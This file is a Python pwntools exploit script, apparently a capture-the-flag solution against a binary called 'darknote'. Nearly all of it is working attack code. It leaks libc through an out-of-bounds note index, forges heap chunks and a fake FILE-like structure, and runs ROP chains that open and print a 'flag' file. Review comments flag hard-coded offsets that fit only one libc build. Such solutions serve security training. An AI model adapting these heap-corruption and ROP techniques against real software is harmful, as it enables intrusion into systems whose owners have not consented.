from pwn import *

# Target process plus the two ELFs used for symbol lookups.  The payload
# helpers further down build ``str`` payloads (``flat(...) + '\n'``,
# ``'\x00'`` filler), i.e. this is Python 2-era pwntools usage.
# NOTE(review): process() is spawned before context.binary is assigned.
io = process('./darknote')
elf = ELF('darknote', checksec = False)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec = False)
context.binary = 'darknote'


def rc(n):
    """Receive exactly *n* bytes from the target."""
    return io.recv(n)


def ru(x):
    """Receive up to and including *x*; the delimiter itself is dropped."""
    return io.recvuntil(x, drop = True)


def sa(a, b):
    """Wait for prompt *a*, then send *b* without a trailing newline."""
    return io.sendafter(a, b)


def sla(a, b):
    """Wait for prompt *a*, then send *b* followed by a newline."""
    return io.sendlineafter(a, b)


def ia():
    """Hand the connection over to the user."""
    return io.interactive()


def uu64(x):
    """Unpack a little-endian u64 from a short leak, right-padded with NULs to 8 bytes."""
    return u64(x.ljust(8, '\x00'))


def libc_os(x):
    """Rebase a libc offset.  ``libc_base`` is a module global assigned later, after the leak."""
    return libc_base + x


def libc_sym(x):
    """Resolve a libc symbol name to its runtime address."""
    return libc_os(libc.sym[x])
def menu(choice):
    """Pick a menu entry: wait for the ``>> `` prompt, then send *choice* as a line."""
    io.sendlineafter('>> ', str(choice))
def add(idx, content):
    """Create a note via menu option 1.

    *idx* is sent as a line after the ``Index: `` prompt; *content* is sent
    raw (no newline appended) after the ``Note: `` prompt, so callers that
    want the input terminated include the ``'\\n'`` themselves.
    """
    sla('>> ', '1')
    sla('Index: ', str(idx))
    sa('Note: ', content)
# Stage 1: leak libc and plant the first fake object.
# Note count: 0x61000000 is far beyond anything a real user would enter;
# presumably chosen so the size computation in the binary wraps — TODO confirm.
sla('How many dark notes do you want?\n', str(0x61000000))
# Note body shaped like a heap chunk: prev_size 0, size 0x71, then a pointer.
# Index 0x103db75 is outside any sane note range; where that index lands is
# not visible here (NOTE(review): out-of-bounds index, confirm against the binary).
pld = flat([ 0, 0x71, 0x0000000000404250-0x10 ])
add(0x103db75, pld + '\n')
add(0, 'a\n')
# The index-1 note is then written through the planted pointer.  Offsets in
# this script (e.g. the 'flag' string at +0x58 later) are consistent with the
# data landing at pointer + 0x10.
# 0x403FD0 is presumably a GOT slot of the non-PIE binary — confirm.
pld = flat({0x10: 0x0000000000403FD0}, filler = '\x00')
add(1, pld + '\n')
ru('==================================\n')
# The 6 bytes after the banner are treated as malloc's address.
libc_base = uu64(rc(6)) - libc.sym['malloc']
# Fixed address in the binary's 0x404xxx region (presumably writable data).
file_addr = 0x00000000004042A0 + 0x300
# Same three-call pattern: fake chunk, consume it, write through the pointer.
pld = flat([ 0, 0x71, file_addr+0x88-0x10 ])
add(0x103db75, pld + '\n')
add(0, 'a\n')
# Offset hard-coded as the difference of two absolute addresses from a debug
# session (= 0x1e8f60); only valid for the author's libc build.
jump_table = libc_os(0x7fa5480e6f60-0x7fa547efe000)
# The names suggest a fake FILE-like object; the meaning of the 0x18/0x50/0x58
# fields is not established here (NOTE(review): confirm against the glibc in use).
pld = flat({ 0: file_addr-0x10, 0x18: file_addr, 0x50: jump_table, 0x58: file_addr + 0x88 + 0x10 }, filler = '\x00')
add(1, pld + '\n')
# Stage 2: place a single libc gadget address at file_addr + 0x100.
# Pointer evaluates to file_addr + 0xf0; the write lands 0x10 past it.
pld = flat([ 0, 0x71, file_addr+0x88-0x10-0x10+0x88 ])
add(0x103db75, pld + '\n')
add(0, 'a\n')
# Hard-coded libc offset (build-specific).  The gadget at this offset is not
# identified in the script; the same value is recomputed again in the next stage.
gadgets = libc_os(0x0000000000154DEA)
pld = flat(gadgets)
add(1, pld + '\n')
# Stage 3: fill in the object at file_addr and build the first ROP chain.
pld = flat([ 0, 0x71, file_addr-0x10 ])
add(0x103db75, pld + '\n')
add(0, 'a\n')
# libc gadget offsets: all hard-coded for one specific libc build.
# ``gadgets`` duplicates the value from the previous stage; ``pop_rbp`` is
# never used.
gadgets = libc_os(0x0000000000154DEA)
leave = libc_os(0x00000000000578c8)
pop_rdi = libc_os(0x0000000000023b6a)
pop_rsi = libc_os(0x000000000002601f)
pop_rdx = libc_os(0x0000000000142c92)
pop_rbp = libc_os(0x00000000000226c0)
pop_rax = libc_os(0x0000000000036174)
syscall = libc_os(0x00000000000630a9)
write_addr = libc_sym('write')
read_addr = libc_sym('read')
# First chain lives right after the gadget planted at file_addr + 0x100;
# the second chain (written later) lives 0x100 further on.
rop_addr = file_addr + 0x100 + 0x10
# Two bytes before pop_rdi; the name says it pops two registers — not verified here.
pop2 = libc_os(0x0000000000023b68)
rop_addr1 = rop_addr + 0x100
rop_chain = flat([
    # Presumably the rbp value for the final ``leave`` below, so the stack
    # pivots to rop_addr1 — how control first reaches this chain depends on
    # the gadget at file_addr + 0x100 and is not established here.
    rop_addr1 - 8,
    pop2,
    0,
    rop_addr,
    # ``pop rdi`` consumes the leave address; rdi is overwritten two entries on.
    pop_rdi,
    leave,
    # rax = 2 (open on x86-64), rdi -> the 'flag\0' string stored at +0x58.
    pop_rax,
    2,
    pop_rdi,
    file_addr + 0x58,
    syscall,
    leave,
])
# +0x48 receives the chain address, +0x58 the NUL-terminated filename.
pld = flat({ 0x48: rop_addr, 0x58: 'flag\x00' }, filler = '\x00')
add(1, pld + '\n')
# Stage 4: write the first ROP chain at rop_addr.
pld = flat([ 0, 0x71, rop_addr - 0x10, ])
add(0x103db75, pld + '\n')
add(0, 'a\n')
add(1, rop_chain + '\n')
# Stage 5: second chain — read(3, file_addr - 0xa0, 0x30) then
# write(1, <same rsi/rdx>, 0x30).  fd 3 assumes the earlier open() returned
# the first free descriptor; rsi/rdx are not reset before the write.
rop_chain = flat([ pop_rdi, 3, pop_rsi, file_addr - 0xa0, pop_rdx, 0x30, read_addr, pop_rdi, 1, write_addr ])
# Written at rop_addr1, where the first chain's final ``leave`` pivots to.
pld = flat([ 0, 0x71, rop_addr1 - 0x10, ])
add(0x103db75, pld + '\n')
add(0, 'a\n')
add(1, rop_chain + '\n')
# Stage 6: store file_addr at 0x4042A0 (pointer is 0x20 below, data at +0x10).
# 0x4042A0 is the base that file_addr was derived from; presumably a global
# the program dereferences afterwards, which is what kicks off the chains —
# NOTE(review): confirm against the binary.
pld = flat([ 0, 0x71, 0x00000000004042A0-0x10-0x10, ])
add(0x103db75, pld + '\n')
add(0, 'a\n')
pld = flat({0x10: file_addr}, filler = '\x00')
add(1, pld + '\n')
ia()